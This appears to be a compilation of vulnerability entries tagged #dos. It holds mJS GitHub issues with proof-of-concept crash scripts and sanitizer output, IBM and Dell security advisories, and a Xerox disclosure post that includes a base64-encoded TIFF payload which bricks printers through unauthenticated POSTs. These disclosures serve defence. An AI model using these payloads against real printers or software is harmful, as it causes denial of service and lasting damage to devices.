Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0x8d28e. This vulnerability can lead to a Denial of Service (DoS).

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-46531: SEGV (/usr/local/bin/mjs+0x8d28e) · Issue #211 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_execute at src/mjs_exec.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    function JSEtest() {
        let arr = [1];
        arr.splice((arr.splice(0, 17)= [1])= [1])= [1]
    }
    JSEtest();
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==23867==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55dcd2425950 bp 0x000000000000 sp 0x7fff558e7b00 T0)
==23867==The signal is caused by a READ memory access.
==23867==Hint: address points to the zero page.
    #0 0x55dcd242594f in mjs\_execute src/mjs\_exec.c:823
    #1 0x55dcd2430a05 in mjs\_exec\_internal src/mjs\_exec.c:1073
    #2 0x55dcd2430a05 in mjs\_exec\_file src/mjs\_exec.c:1096
    #3 0x55dcd23ed909 in main src/mjs\_main.c:47
    #4 0x7f63f4c54b96 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21b96)
    #5 0x55dcd23ee449 in \_start (/usr/local/bin/mjs+0xe449)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mjs\_exec.c:823 in mjs\_execute

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46530: SEGV src/mjs_exec.c:823 in mjs_execute · Issue #206 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0x8814e. This vulnerability can lead to a Denial of Service (DoS).

CVE-2021-46529: SEGV (/usr/local/bin/mjs+0x8814e) · Issue #210 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_apply at src/mjs_exec.c. This vulnerability can lead to a Denial of Service (DoS).

CVE-2021-46512: SEGV src/mjs_exec.c:1155 in mjs_apply · Issue #202 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_stack_size at mjs/src/mjs_core.c. This vulnerability can lead to a Denial of Service (DoS).

CVE-2021-46516: SEGV mjs/src/mjs_core.c:348:13 in mjs_stack_size · Issue #201 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0x5361e. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    function D(i) {
        [i]
    }
    function A() {
        return D.apply - 1;
    }
    function JSEtest(i) {
        return A(i, 1, 2, 3);
    }
    JSEtest(0.2)(0.2)
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==76668==ERROR: AddressSanitizer: SEGV on unknown address 0x561aeef915ac (pc 0x561aeef9161f bp 0x0000000000a6 sp 0x7ffe3d8aa358 T0)
==76668==The signal is caused by a WRITE memory access.
    #0 0x561aeef9161e  (/usr/local/bin/mjs+0x5361e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/mjs+0x5361e)
==76668==ABORTING

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46528: SEGV (/usr/local/bin/mjs+0x5361e) · Issue #208 · cesanta/mjs

The application is prone to a DoS after receiving a long server response (more than 2K bytes) leading to 100% CPU consumption.

Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)

IBM Security Guardium Insights 3.0 could allow an authenticated user to obtain sensitive information due to insufficient session expiration. IBM X-Force ID: 205256.

  

**Summary**

IBM Security Guardium Insights has addressed the following vulnerabilities:

**Vulnerability Details**

**CVEID:**   CVE-2021-33198  
**DESCRIPTION:**   Golang Go is vulnerable to a denial of service, caused by a flaw in the SetString and UnmarshalText methods of math/big.Rat. By sending a specially-crafted input, a remote attacker could exploit this vulnerability to cause a panic or an unrecoverable fatal error, and results in a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/206604 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2021-29846  
**DESCRIPTION:**   IBM Security Guardium Insights could allow an authenticated user to obtain sensitive information due to insufficient session expiration  
CVSS Base score: 2.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/205256 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2021-34558  
**DESCRIPTION:**   Golang Go is vulnerable to a denial of service, caused by the failure to properly assert that the type of public key in an X.509 certificate matches the expected type in the crypto/tls package. By persuading a victim to connect to a specially-crafted TLS server, a remote attacker could exploit this vulnerability to cause a TLS client to panic.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/205578 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2021-33197  
**DESCRIPTION:**   Golang Go could allow a remote attacker to bypass security restrictions, caused by a flaw in the ReverseProxy in net/http/httputil. By sending a specially-crafted request, an attacker could exploit this vulnerability to drop arbitrary headers, including those set by the ReverseProxy.Director.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/206603 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)

**CVEID:**   CVE-2021-29845  
**DESCRIPTION:**   IBM Security Guardium Insights could allow an authenticated user to perform unauthorized actions due to improper input validation.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/205255 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2021-33195  
**DESCRIPTION:**   Golang Go could allow a remote attacker to execute arbitrary code on the system, caused by not following RFC 1035 rules in the LookupCNAME, LookupSRV, LookupMX, LookupNS, and LookupAddr functions in net. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/206601 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2021-29838  
**DESCRIPTION:**   IBM Security Guardium Insights could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/205026 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2021-33196  
**DESCRIPTION:**   Golang Go is vulnerable to a denial of service, caused by a flaw in the NewReader and OpenReader functions in archive/zip. By persuading a victim to open a specially-crafted archive file, a remote attacker could exploit this vulnerability to cause a panic or an unrecoverable fatal error, and results in a denial of service condition.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/206602 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2021-29923  
**DESCRIPTION:**   Golang Go could allow a remote attacker to bypass security restrictions, caused by improper consideration for extraneous zero characters at the beginning of an IP address octet. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass access control based on IP addresses.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/207025 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)

**CVEID:**   CVE-2021-3749  
**DESCRIPTION:**   axios is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw in the trim function. By sending a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause an application to consume an excessive amount of CPU.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/208438 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2021-22918  
**DESCRIPTION:**   Node.js is vulnerable to a denial of service, caused by an out-of-bounds read in the libuv's uv\_\_idna\_toascii() function. By invoking the function using dns module's lookup() function, a remote attacker could exploit this vulnerability to obtain sensitive information or cause a denial of service.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/204784 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Security Guardium Insights

3.0

  

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

John Zuccato, Rodney Ryan, Chris Shepherd, Vince Dragnea, Troy Fisher, Nathan Roane, Elaheh Samani and Gabor Minyo, John Zuccato, Rodney Ryan, Chris Shepherd, Vince Dragnea, Troy Fisher, Nathan Roane, Elaheh Samani and Gabor Minyo, X-Force EHT: Chris

**Change History**

25 Jan 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSMPHH","label":"IBM Security Guardium"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"3.0","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2021-29846: Security Bulletin: IBM Security Guardium Insights is affected by multiple vulnerabilities

Xerox VersaLink devices through 2022-01-24 allow remote attackers to brick the device via a crafted TIFF file in an unauthenticated HTTP POST request. There is a permanent denial of service because image parsing causes a reboot, but image parsing is restarted as soon as the boot process finishes. However, this boot loop can be resolved by a field technician. The TIFF file must have an incomplete Image Directory. Affected firmware versions include xx.42.01 and xx.50.61.

![](https://neosmart.net/blog/wp-content/uploads/2022/01/Xerox-Vulnerable-600x425.png)

In the world of network security, it pays to always remember that many (if not most!) security bugs start off their lives as seemingly innocuous “regular” bugs, and it’s only by diligently considering how aberrant behavior – say, incorrect results returned for particular inputs or a mere “stability issue” that turns out to actually be a use-after-free causing the observed crashes – could be abused by determined malicious actors that the underlying security implications become obvious. This has great benefits: for instance, it can be argued that it wasn’t until Microsoft started taking BSoDs that could be triggered by unprivileged users seriously, recognizing them for the open backdoors most of them were, that Windows actually became usably stable.

Of course, then there are the bugs that have such blatantly obvious security implications that it would be hard to qualify them as wolves in sheep’s clothing. Someone encountering such a bug, even if not particularly security-minded, would be forced to immediately recognize the risk they pose even if only because they have to deal with its consequences. This post is about such a security bug that I encountered in the same vein as many others in the past: simply trying to do something completely unrelated and running into a vulnerability that made the task at hand that much harder.

In September of 2019, I ran into an issue while developing a one-click scan-to-print daemon that POSTed documents to the (by default, unsecured/unauthenticated) web interface on Xerox network printers. While the original project was working fully, the goal was to have scanned multipage documents print as multipage documents (rather than as several one-page documents) without introducing a PDF or PostScript dependency in the daemon, which was submitting the images to the printer’s job queue as JPEGs at the time. Seeing that the Xerox web interface supported TIFF documents, my approach was to create and send a multi-page TIFF document and see if that was supported by the printer.1 Given that the code was already handling the scanned images as JPEG and given that the TIFF document model actually lets you use TIFF as a container hosting non-TIFF (i.e. JPEG) data, I created a multi-page TIFF with each page set up as a TIFF Image File Directory hosting a page of the scanned document as a JPEG-compressed image.

I never got to test my idea as I was hasty in the coding stage and unwittingly attempted to test the daemon with a valid multi-page TIFF container, but one where the TIFF Image Directory wasn’t correctly finalized (the pages within the TIFF were incomplete). Imagine my surprise – and anguish – when I discovered that the payload would – seemingly permanently – brick the network-attached printer! Here are the details of what happens:

**The Xerox network brick vulnerability**

1.  The user/attacker submits a TIFF document with an incomplete Image Directory payload to the network printer. In addition to being done manually (by printing the document from a USB-attached PC or selecting the document to print via the web interface) this can also be done programmatically with a script that does the same, but over the network. What’s more, **this is even doable over the web** via a JavaScript payload (easier if the IP address of the printer is known) because unauthenticated network users may POST payloads to the printer via bog-standard http(s) POST requests that aren’t even secured by a nonce (which I’m generally grateful for in the name of scriptability and convenience) and for which current cross-origin mitigations are insufficient!
2.  The printer, before it actually prints the document, opens the document to inspect its contents and to determine what resources are needed to complete the job (so it can request paper in the correct tray, count pages for accounting purposes, etc). In this case, **the TIFF handler in the Xerox firmware runs into unhandled/undefined behavior as it attempts and fails to parse the image directories within the TIFF container**, and the printer firmware panics, displaying a message to the user indicating that an unexpected error has occurred and that a hard reboot is required for the printer to resume working.
3.  Upon reboot, the print queue manager attempts to resume the job at the front of the print queue, **which is still our buggy document**, runs into the same issue described in the previous point, and panics requesting a reboot once more.
4.  This continues ad infinitum, as jobs are persisted to non-volatile memory and are not cleared when the unit is unplugged or restarted **effectively bricking the device**. The print queue management (web or on-device) interface is inaccessible before the printer reaches the point where it tries to read the failed job and it is inaccessible after the panic, meaning there’s no means via any of the available user interfaces for the print queue to be cleared to break out of this vicious loop.

**Timeline of discovery and reporting**

To the best of my knowledge, this vulnerability remains unpatched and continues to affect a number of Xerox printers across different product/model lines. This full, public disclosure is being made given the egregious amount of time that has elapsed since this issue was brought to Xerox’s attention. The exact timeline of events (below) has been recreated from the emails I have regarding this issue:

1.  I discovered this issue the week of September 23, 2019. After running into the initial issue and figuring out a tedious workaround that enabled me to recover my printer (see below), I attempted to narrow down the parameters of the exploit until I had a sub-kilobyte payload that could reliably reproduce the issue.
2.  After confirming the security ramifications of the vulnerability, I first contacted Xerox via the automated security-related contact form on their United States website with a brief synopsis of the issue. To the credit of the security officer assigned to the case, I had a response within roughly an hour with the requested contact and disclosure information I had requested, while thanking me for my “responsible disclosure.”
3.  On September 26, 2019, I replied with the details of the exploit and provided a sample payload (attached to this post) that would trigger the network brick procedure. Half an hour later, the security specialist assigned to the case had replied:  
    
    > I will turn this over to the proper development team and see what they can determine. **We’ll let you \[know\]** as soon as we have our assessment done and some idea as to what we might plan to do to address the issue, and **we definitely will keep you apprised of our progress** on this.
    
4.  I did not hear anything back until I emailed requesting an update on January 14, 2020 (over three months later):  
    
    > I have not heard back regarding this matter, but there have been new firmware releases since then.
    > 
    > Was this issue addressed?
    
5.  I received a reply within the hour informing me that **the vulnerability was confirmed but still not fixed** for the Versalink line of printers and found to not affect the Altalink line of printers (which I’d included in the original report for sharing portions of the software stack):  
    
    > We did finish our assessment and was able to confirm your results for VersaLink. However, we found that AltaLink is not vulnerable to this TIFF vulnerability.
    > 
    > We have forwarded your results to the 3rd party vendor that developed the VersaLink software to develop a fix for this TIFF vulnerability but so far we have yet received it yet.
    

Given that it has now been not 90 days but closer to two-and-a-half years since this issue was disclosed to Xerox Corp and I have not received any updates regarding the matter, I have decided to disclose this publicly (which I probably should have done much sooner but kept putting off for the same $reasons that make me put a lot of things off).

**Vulnerability details**

*   CVE: CVE-2022-23968
*   Class: Denial-of-service
*   Severity: Critical (bricked, semi-permanent)
*   Exploitable: Over the internet, over the local network, in person from a connected PC, in person at the device in question
*   Privately reported: September 25, 2019 to Xerox product security
*   Publicly disclosed: January 24, 2022
*   Status: confirmed by Xerox product security specialist and security researchers, confirmed not resolved as of January 2020, believed not resolved as of January 2022.
*   Affected devices: all Xerox Versalink business printers and copy machines, potentially other models such as Phaser and WorkCentre as well.
*   Affected firmware versions: tested against firmware version xx.42.01 and xx.50.61, confirmed by Xerox to also affect later versions, believed to affect all previous and later versions as of the date of this posting
*   Permissions required for in-person exploit: None (documents may be submitted over USB, LAN, or selected in-person from a USB stick)
*   Permissions required for LAN exploit: None by default (as all LAN users are allowed to POST jobs to the handling endpoint over http(s) by default)
*   Permissions required for exploit over the internet: None by default. The device’s web interface exposes an http(s) POST interface that is not protected by any nonce and for which cross-site origin mitigations are useless as the response may be freely discarded. Only the device’s name or IP address on the destination network is required, although even that is not required as it may be discovered via JavaScript given that the endpoint URL is fixed and IPv4 is enabled by default, limiting the possible search space.
*   Discovered by: Mahmoud Al-Qudsi, NeoSmart Technologies

**Proof-of-Concept**

The contents of the following archive may be submitted to a vulnerable Xerox printer to trigger the remote brick: `xerox brick.rar` (345 bytes). The TIFF payload is also included in this base64-encoded attachment:

UmFyIRoHAQAzkrXlCgEFBgAFAQGAgAD5BbdHEwMC5QAE5QAA9kPUNIAAAANDTVRYZXJveCByZW1v
dGUgYnJpY2sgcGF5bG9hZCBieSBNYWhtb3VkIEFsLVF1ZHNpDQpTZWUgaHR0cHM6Ly9uZW9zbWFy
dC5uZXQvYmxvZy8/cD00ODY1IGZvciBtb3JlIGluZm8uAOsG2ysrAgMLjQEEvAMgCd+uuYADAA94
ZXJveCBicmljay50aWYKAwIA/Fsg4nPVAcISiiBENSb2YDSTz9+g+ofkEQVoaUFeJvK3kDY8WbGp
HgjY0bFPe8gzgjwjaJNmzSGzlGGm0ZRkySYEISicQttsKElCEti8EbSsdkcDz6/WmRz/N1o/EIEf
YPQUn+fPO4RLXjWeRbJT8isQTI5AnW6pF0WsD5DaxM4tgNHp3U7xR1fsHuvMYwMeDGyHIB13VlED
BQQA

I am withholding the sample code to exploit this over the network or over the internet at this time, although it is trivially implemented given the payload TIFF file above and some monitoring of outgoing requests in the browser inspector while normally submitting a job via the on-device web interface.

**Workarounds and Mitigations**

**Immediate Mitigation**: Configure the devices to deny all print privileges to unauthenticated users, both over the network and in-person. Remove access to affected printers from any USB- or network-connected PCs or devices used by untrusted individuals.

**Recovering Bricked Devices**: If there are any unapplied firmware updates, a network firmware update procedure may be initiated which will upgrade the device and in the process, clear the job queue. This breaks the device out of its reboot-panic loop. Otherwise, manually desoldering and wiping/reprogramming the storage module on the device mainboard is required to clear the job queue and unbrick the device. _It is likely – but not verified – that a Xerox field technician may be able to clear the NVRAM by initiating an undocumented startup sequence that bypasses the print queue or by jumping specific pins on the mainboard._

**Updates**

Follow me on twitter @mqudsi and follow NeoSmart Technologies @neosmart for updates, or see below:

*   January 25, 2022: This vulnerability has been assigned CVE ID 2022-23968

_This article will be updated with a CVE id when one is assigned. Any other updates will be posted as they come to light._

> I’m reporting a zero-day that lets unauthenticated network users remotely brick Xerox printers. I reported this to Xerox in 2019 and decided it’s been long enough. https://t.co/EZtnDz4AzC
> 
> — Mahmoud Al-Qudsi (@mqudsi) January 24, 2022

1.  Baseline TIFF support requires that decoders are capable of handling multi-page TIFF documents, even if they are only capable of reading/displaying the first page. ↩

CVE-2022-23968: CVE-2022-23968: Xerox vulnerability allows unauthenticated users to remotely brick network printers

iDRAC9 versions prior to 5.00.20.00 contain an input injection vulnerability. A remote authenticated malicious user with low privileges may potentially exploit this vulnerability to cause information disclosure or denial of service by supplying specially crafted input data to iDRAC.

Artikkelin numero: 000194038

**Yhteenveto: Dell EMC iDRAC remediation is available for multiple security vulnerabilities that may be exploited by malicious users to compromise the affected system.**

*   Artikkelin sisältö
*   Juridiset tiedot
*   Artikkelin ominaisuudet
*   Arvostele tämä artikkeli

**Artikkelin sisältö**

**Vaikutus**

Medium

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2021-36347

Dell EMC iDRAC9 versions before 5.00.20.00 and iDRAC8 versions before 2.82.82.82 contain a stack-based buffer overflow vulnerability. An authenticated remote attacker with high privileges may potentially exploit this vulnerability to control process execution and gain access to the iDRAC operating system.

6.2

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L

CVE-2021-36348

Dell EMC iDRAC9 versions before 5.00.20.00 contain an input injection vulnerability. A remote authenticated malicious user with low privileges may potentially exploit this vulnerability to cause information disclosure or denial of service by supplying specially crafted input data to iDRAC.

5.9

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:L

CVE-2021-36346

Dell EMC iDRAC8 versions before 2.82.82.82 contain a denial of service vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to deny access to the iDRAC webserver.

5.3

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

 

**Third-party Component** 

**CVE**

**More information**

OpenSSL

CVE-2021-3712

See NVD (https://nvd.nist.gov/vuln/detail/CVE-2021-3712) for individual scores for each CVE.

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2021-36347

Dell EMC iDRAC9 versions before 5.00.20.00 and iDRAC8 versions before 2.82.82.82 contain a stack-based buffer overflow vulnerability. An authenticated remote attacker with high privileges may potentially exploit this vulnerability to control process execution and gain access to the iDRAC operating system.

6.2

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L

CVE-2021-36348

Dell EMC iDRAC9 versions before 5.00.20.00 contain an input injection vulnerability. A remote authenticated malicious user with low privileges may potentially exploit this vulnerability to cause information disclosure or denial of service by supplying specially crafted input data to iDRAC.

5.9

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:L

CVE-2021-36346

Dell EMC iDRAC8 versions before 2.82.82.82 contain a denial of service vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to deny access to the iDRAC webserver.

5.3

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

 

**Third-party Component** 

**CVE**

**More information**

OpenSSL

CVE-2021-3712

See NVD (https://nvd.nist.gov/vuln/detail/CVE-2021-3712) for individual scores for each CVE.

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen****Kiitokset**

CVE-2021-36346: Dell Technologies would like to thank Ken Pyle from CYBIR for reporting this issue.

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2021-12-16

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Juridiset tiedot**

Tämän Dell Technologiesin tietoturvatiedotteen tiedot on luettava, ja niiden avulla voidaan välttää tilanteita, jotka voivat johtua tässä kuvatuista ongelmista. Dell Technologiesin tietoturvatiedotteet tuovat tärkeitä tietoturvatietoja haavoittuvuudelle alttiiden tuotteiden käyttäjien tietoon. Dell Technologies arvioi riskin perustuen asennettujen järjestelmien hajautetun joukon keskimääräisiin riskeihin, eikä se välttämättä vastaa paikallisen asennuksen ja yksittäisen ympäristön todellista riskiä. Suositus on, että kaikki käyttäjät ratkaisevat näiden tietojen sovellettavuuden yksittäisten ympäristöjen mukaan ja ryhtyvät tarvittaviin toimenpiteisiin. Tässä esitetyt tiedot annetaan "sellaisenaan" ilman minkäänlaista takuuta. Dell Technologies kiistää kaikki suorat tai epäsuorat takuut, mukaan lukien takuut soveltuvuudesta kaupankäynnin kohteeksi, sopivuudesta tiettyyn käyttötarkoitukseen, omistusoikeudesta ja loukkaamattomuudesta. Dell Technologies, sen tytäryhtiöt tai toimittajat eivät missään tilanteessa ole vastuussa mistään vahingoista, jotka johtuvat tässä asiakirjassa mainituista tiedoista tai toimenpiteistä, joihin käyttäjä päättää ryhtyä. Tämä koskee kaikkia suoria, epäsuoria, satunnaisia, välillisiä, liikevoiton menetykseen liittyviä tai erityisluontoisia vahinkoja, vaikka Dell Technologies tai sen tytäryhtiöt tai toimittajat olisivat saaneet tiedon tällaisten vahinkojen mahdollisuudesta. Jotkin osavaltiot eivät salli satunnaisten tai seuraamuksellisten vahinkojen vastuun poistamista tai rajoittamista, joten edellä mainittua rajoitusta sovelletaan vain lain sallimassa laajuudessa.

**Artikkelin ominaisuudet**

**Tuote, johon asia vaikuttaa**

iDRAC8, iDRAC7/8 with Lifecycle Controller Version 2.50.50.50, iDRAC7/8 with Lifecycle Controller Version 2.52.52.52, iDRAC7/8 with Lifecycle Controller Version 2.60.60.60, iDRAC7/8 with Lifecycle Controller Version 2.61.60.60Näytä lisää

**Tuote**

iDRAC9, iDRAC8 with Lifecycle Controller version 2.80.80.80, iDRAC8 with Lifecycle Controller version 2.81.81.81, iDRAC9 - 3.0x Series, iDRAC9 - 3.1x Series, iDRAC9 - 3.2x Series, iDRAC9 - 3.3x Series, iDRAC9 - 3.4x Series, iDRAC9 - 4.xx SeriesNäytä lisää

**Edellinen julkaisupäivä**

16 joulu 2021

**Versio**

2

**Artikkelin tyyppi**

Dell Security Advisory

**Arvostele tämä artikkeli**

Kaikki kentät ovat pakollisia, jollei toisin ole merkitty.

Tag

#dos